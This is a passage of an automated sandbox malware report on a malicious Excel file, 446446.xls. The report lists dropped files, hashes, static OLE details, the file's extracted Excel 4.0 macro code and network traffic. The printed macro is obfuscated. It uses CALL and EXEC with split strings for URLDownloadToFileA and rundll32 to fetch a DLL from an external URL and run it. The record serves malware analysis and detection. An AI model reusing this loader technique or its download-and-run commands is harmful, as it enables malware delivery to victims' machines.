                            • 148.72.208.50
                            _.ryder.com._1602499153.666014.dllGet hashmaliciousBrowse
                            • 166.62.30.150
                            mW07jhVxX5.exeGet hashmaliciousBrowse
                            • 184.168.131.241
                            jEXf5uQ3DE.exeGet hashmaliciousBrowse
                            • 184.168.131.241

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\4HeVw[1].perclick
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                            Category:downloaded
                            Size (bytes):449536
                            Entropy (8bit):5.5101637778448955
                            Encrypted:false
                            SSDEEP:6144:BqeyCMxv21VX5rHrP9HlIjlYVnvi5TnMTBs7xTUgzFxmSZ81gVRHZOXTulpwNF6c:Bq9CAvi3LlHXtiyTBITzwTCAa6dx
                            MD5:CBEA511BD35F247E4B4BF7CC5A3A7CBD
                            SHA1:8C0D352934271350CFE6C00B7587E8DC8D062817
                            SHA-256:0AE86E5ABBC09E96F8C1155556CA6598C22AEBD73ACBBA8D59F2CE702D3115F8
                            SHA-512:AEC894D9D3AACCCCC029C615D283AF4946C5150372DB0ECDD616A9D491478759068214BF03DB11631A5EFB59951150D92C1517C2C11D8C6F0DDF5C8F76734FCF
                            Malicious:true
                            Reputation:low
                            IE Cache URL:http://living-traditions.com/blogs/click.php
                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1P.Lu1..u1..u1..?T..t1...S..r1..u1..p1..eW..q1..eW..t1..eW..t1..Richu1..................PE..L....+t`...........!.....(..........m........@............................... ......(.....@.........................@@..D...hA..P................................... @...............................................@.. ............................text....&.......(.................. ..`.rdata..D....@.......,..............@..@.data...8@...P...B...0..............@....pdata...g.......h...r..............@....reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\90DE0000
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):80628
                            Entropy (8bit):7.888145041366286
                            Encrypted:false
                            SSDEEP:1536:ZnC+ow5JeueA6rWGH3WdPMAeWRlMVGoIahaDHTU6hryF70Ki9h:ZnC+oQirW23WhMg2sTU2yF70KiD
                            MD5:B0C770DA6FFF46D0500CCF97D7CDA12A
                            SHA1:664AE1F31F2012830589FD05CB8798918F6F0219
                            SHA-256:3BF029B9AB1A47C8BB4C5EB0DF93AC234CFF71835AA2D9E58C342F3A1BBD29BA
                            SHA-512:C1A27AAFEB6D561E23AEC2CDFE4EDD527AC92214853020F37F2F41402E1389619173FDE9B67ECD04561CF9EC7BB28E01A9A0A6302855779103CC213138CC8591
                            Malicious:false
                            Reputation:low
                            Preview: .U.n.0....?......(..r.Izl.4...9..s..$..wH+nb(^.......h~1.]=`....53V..N*.l.....WV..V.v.[......?.o..cEh.[..q.E..b.<Z.t..H....X....l...g..T.....+..^..z...o......R-S&..8.D..&.C.+..:..{..$Z..`.N.z..........}E!W^.x.0.~...%....~...|....s.f?Ivib..@...15.Dp...4R..}r.G. #/..#$_nr.N..N....&.. ...MNR...(.G#.&}..m...../r.Gd.G...M..aD^.o..Bs`9cZk.G.9....R.!......w7......1[.....}$.Kg.&8....<}..:ZF..0$..6.1....N.......D9...Of........PK..........!................[Content_Types].xml ...(............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\446446.LNK
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Mon Apr 12 23:05:38 2021, atime=Mon Apr 12 23:05:38 2021, length=106496, window=hide
                            Category:dropped
                            Size (bytes):1984
                            Entropy (8bit):4.464349531148646
                            Encrypted:false
                            SSDEEP:24:8Dnbk/XTd6jFyPDVeMsODv3qcTdM7dD2Dnbk/XTd6jFyPDVeMsODv3qcTdM7dV:8s/XT0jFwDVmlWQh2s/XT0jFwDVmlWQ/
                            MD5:4348595ED5C238F3A7464C51D0660C8B
                            SHA1:E63FE61EDDE7BE6C9F33EBF482C9452B52F2657F
                            SHA-256:727289508032F34D8792E6DFD9DE538C64EEE1A0932ADB30431893A482159B92
                            SHA-512:67193929EBE343C53FDB503307E034CA17218201E337B5BECF8449D140FC81E065567F7641F4BFC51B35EACBBB852072B8C1A74E872EE9C997AF7C2B8A9607CB
                            Malicious:false
                            Reputation:low
                            Preview: L..................F.... ......{..'.N../..H.U../...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....\.2..R...R.. .446446.xls..B.......Q.y.Q.y*...8.....................4.4.6.4.4.6...x.l.s.......t...............-...8...[............?J......C:\Users\..#...................\\887849\Users.user\Desktop\446446.xls.!.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.4.4.6.4.4.6...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......887849..........D_....3N...W...9F.C...........[D_....3N...W...9F.C...........[....L.......
                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Mon Apr 12 23:05:38 2021, atime=Mon Apr 12 23:05:38 2021, length=8192, window=hide
                            Category:dropped
                            Size (bytes):867
                            Entropy (8bit):4.473944875294604
                            Encrypted:false
                            SSDEEP:12:85QD7LgXg/XAlCPCHaXtB8XzB/xqvX+WnicvbIsnbDtZ3YilMMEpxRljK3wXyTdK:85w/XTd6j6vYeMsbDv3qcTrNru/
                            MD5:0A126F4CE8A412A7E0B56FDD34D13F90
                            SHA1:205C7790F9A579AD5D87877D7D4A488A388B8AA8
                            SHA-256:9C63D6D21963E3AD8536BC4761DC624A4D7A490F608BFE2BDE5CC491B36C3606
                            SHA-512:B1A35E61AB7B52CFD5089807AE8B7EA604E52AFD6FE173EC324EACC8DDEC428A76ACF5024E8E41A030CAC311DBE52557D81A237DDEF72C953EE0F9C61A750386
                            Malicious:false
                            Reputation:low
                            Preview: L..................F...........7G..'.N../..'.N../... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R....Desktop.d......QK.X.R..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\887849\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......887849..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):71
                            Entropy (8bit):4.032792717761047
                            Encrypted:false
                            SSDEEP:3:oyBVomMJRT30YVo730YVomMJRT30YVov:dj6J1E4B46J1E4y
                            MD5:E9BA10F8D1524D050B02A3E80256C566
                            SHA1:950B596DB0C42E0A9B02ACEEB0166DACB72B96AE
                            SHA-256:8B69C0A0164EEC53F4F1BEAD5E95EBE38B27A23903D4D08570DBA040E6E93C0B
                            SHA-512:9E626D38996BF29D3616FDCDB6CDDA07B141054294512ADA00A2E18A250F682EB34D0C3CA75796170D096183329298C695F099EAF2DB6FDA1181364033C4B3F3
                            Malicious:false
                            Reputation:low
                            Preview: Desktop.LNK=0..[xls]..446446.LNK=0..446446.LNK=0..[xls]..446446.LNK=0..
                            C:\Users\user\Desktop\51DE0000
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:Applesoft BASIC program data, first line number 16
                            Category:dropped
                            Size (bytes):138843
                            Entropy (8bit):6.821911851482883
                            Encrypted:false
                            SSDEEP:3072:e88rmjAItyzElBIL6lECbgBGGP5xLm7TD2jTUqyF70Ci6W2fXGUVxvfXGURH88rd:R8rmjAItyzElBIL6lECbgBvP5Nm7TUUJ
                            MD5:B68BAB90F3799DF7526E7FDF201A9D29
                            SHA1:50AFB3C63A6BD986AF93D8B15B8F783585FFC295
                            SHA-256:276BA2D933458EE7908C4B881C60C131A2CBDD8914ED4938DE68D74D10F95F78
                            SHA-512:D9CC208214B67AF0C5A0C84EB31B9975CB85F9392E63635CBA2946F7CC6B2F9D96434A05CF0C7A5D59ED92B8D8F18474FDDA68E8D120AA8F78DAD56635ACEF31
                            Malicious:false
                            Reputation:low
                            Preview: ........g2..........................\.p....user B.....a.........=...............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...@...8...........C.a.l.i.b.r.i.1...@...............C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...........
                            C:\Users\user\fdinmd.fii
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):449536
                            Entropy (8bit):5.5101637778448955
                            Encrypted:false
                            SSDEEP:6144:BqeyCMxv21VX5rHrP9HlIjlYVnvi5TnMTBs7xTUgzFxmSZ81gVRHZOXTulpwNF6c:Bq9CAvi3LlHXtiyTBITzwTCAa6dx
                            MD5:CBEA511BD35F247E4B4BF7CC5A3A7CBD
                            SHA1:8C0D352934271350CFE6C00B7587E8DC8D062817
                            SHA-256:0AE86E5ABBC09E96F8C1155556CA6598C22AEBD73ACBBA8D59F2CE702D3115F8
                            SHA-512:AEC894D9D3AACCCCC029C615D283AF4946C5150372DB0ECDD616A9D491478759068214BF03DB11631A5EFB59951150D92C1517C2C11D8C6F0DDF5C8F76734FCF
                            Malicious:true
                            Reputation:low
                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1P.Lu1..u1..u1..?T..t1...S..r1..u1..p1..eW..q1..eW..t1..eW..t1..Richu1..................PE..L....+t`...........!.....(..........m........@............................... ......(.....@.........................@@..D...hA..P................................... @...............................................@.. ............................text....&.......(.................. ..`.rdata..D....@.......,..............@..@.data...8@...P...B...0..............@....pdata...g.......h...r..............@....reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................

                            Static File Info

                            General

                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Last Saved By: 5, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Apr 12 15:51:16 2021, Security: 0
                            Entropy (8bit):3.2150745788685295
                            TrID:
                            • Microsoft Excel sheet (30009/1) 78.94%
                            • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                            File name:446446.xls
                            File size:283136
                            MD5:1b62b4f4b16d6219dce4c6d145c5af79
                            SHA1:d5bc46f3043119c020ae93121195aabbf151cf75
                            SHA256:dd3ecdcc3a6cc81ee451f90703cc899ff43c7a05b30a6538e5f3afd73f77adb1
                            SHA512:1a774ebb111463491f16a88b465e959c14ba32b6a399f108abe43fef66e61b663840998efdcd504306f3b28dd052032b82e8e642ffc9f9ed05186aaedbaf420e
                            SSDEEP:6144:DcPiTQAVW/89BQnmlcGvgZ7r3J8b5I2JK+2vYft:mwt
                            File Content Preview:........................>.......................'..........................."...#...$...%...&..................................................................................................................................................................

                            File Icon

                            Icon Hash:e4eea286a4b4bcb4

                            Static OLE Info

                            General

                            Document Type:OLE
                            Number of OLE Files:1

                            OLE File "446446.xls"

                            Indicators

                            Has Summary Info:True
                            Application Name:Microsoft Excel
                            Encrypted Document:False
                            Contains Word Document Stream:False
                            Contains Workbook/Book Stream:True
                            Contains PowerPoint Document Stream:False
                            Contains Visio Document Stream:False
                            Contains ObjectPool Stream:
                            Flash Objects Count:
                            Contains VBA Macros:True

                            Summary

                            Code Page:1251
                            Last Saved By:5
                            Create Time:2006-09-16 00:00:00
                            Last Saved Time:2021-04-12 14:51:16
                            Creating Application:Microsoft Excel
                            Security:0

                            Document Summary

                            Document Code Page:1251
                            Thumbnail Scaling Desired:False
                            Contains Dirty Links:False

                            Streams

                            Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                            General
                            Stream Path:\x5DocumentSummaryInformation
                            File Type:data
                            Stream Size:4096
                            Entropy:0.335261663834
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . . D o c s 1 . . . . . D o c s 2 . . . . . D o c s 3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . .
                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c8 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 86 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 04 00 00 00
                            Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                            General
                            Stream Path:\x5SummaryInformation
                            File Type:data
                            Stream Size:4096
                            Entropy:0.244430475899
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . d . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . J . J . / . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 84 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 08 00 00 00 40 00 00 00 12 00 00 00 4c 00 00 00 0c 00 00 00 64 00 00 00 0d 00 00 00 70 00 00 00 13 00 00 00 7c 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 35 00 00 00 1e 00 00 00
                            Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 270942
                            General
                            Stream Path:Book
                            File Type:Applesoft BASIC program data, first line number 8
                            Stream Size:270942
                            Entropy:3.18416886572
                            Base64 Encoded:True
                            Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . 5 B . . . . . . . . . . . . . . . . . . . . . . . D o c s 2 . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . 6 . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X .
                            Data Raw:09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 01 35 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                            Macro 4.0 Code

                            "=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CALL(Docs3!BX29&Docs3!BQ24&Docs3!BQ33&Docs3!BQ34,Docs3!BZ29&Docs3!CC33&Docs3!BY31&Docs3!CC35&Docs3!CC36,Docs3!CF29&Docs3!CF30,0,Docs3!BX9,Docs3!CD19,0,0)"=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=Docs1!BC13()
                            ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=EXEC(Docs3!BS36&Docs3!BS37&Docs3!CF43&Docs3!CF44&Docs3!CD19&Docs3!BZ37&Docs3!BZ39&Docs3!BZ43&Docs3!BZ44)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=CHAR(151515131)=UPPER(215151615)=COS(55415151515151)=Docs3!BA22(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
                            ,,,,,,,,,,,,,,,,,,,,,,,http://living-traditions.com/blogs/click.php,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..\fdinmd.fii,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,RL,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,U,,UR,,,,,,JJC,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,CBB,,,,,,,,,,,,,,,,,,,,,,,,nload,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,Mo,,,,,,,,,,,,LDow,,,,,,,,,,,,,,,,,,,n,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ToFil,,,,,,,,,,,,,,,,,,,,,r,,,,,,,,,,eA,,,,,,,,,,,,,,,,,,,,,u,,,,,,,",St",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,a,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,rt,,,,,,ndl,,,,,,,,,,,,,,,,,,,,,,,,,W,,,,,,l32

                            Network Behavior

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Apr 12, 2021 17:06:02.567907095 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:02.698780060 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:02.698952913 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:02.699388027 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:02.829914093 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:02.888154984 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:02.888185978 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:02.888209105 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:02.888232946 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:02.888254881 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:02.888258934 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:02.888276100 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:02.888279915 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:02.888286114 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:02.888300896 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:02.888308048 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:02.888324976 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:02.888334990 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:02.888350010 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:02.888351917 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:02.888376951 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:02.888387918 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:02.888410091 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:02.892734051 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.019260883 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.019337893 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.019397020 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.019450903 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.019454956 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.019486904 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.019503117 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.019509077 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.019560099 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.019568920 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.019619942 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.019619942 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.019670010 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.019670010 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.019721985 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.019721985 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.019769907 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.019773006 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.019818068 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.019830942 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.019881964 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.019882917 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.019932985 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.019933939 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.019979000 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.019983053 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.020030975 CEST4916580192.168.2.2264.207.186.30
                            Apr 12, 2021 17:06:03.020031929 CEST804916564.207.186.30192.168.2.22
                            Apr 12, 2021 17:06:03.020078897 CEST4916580192.168.2.2264.207.186.30
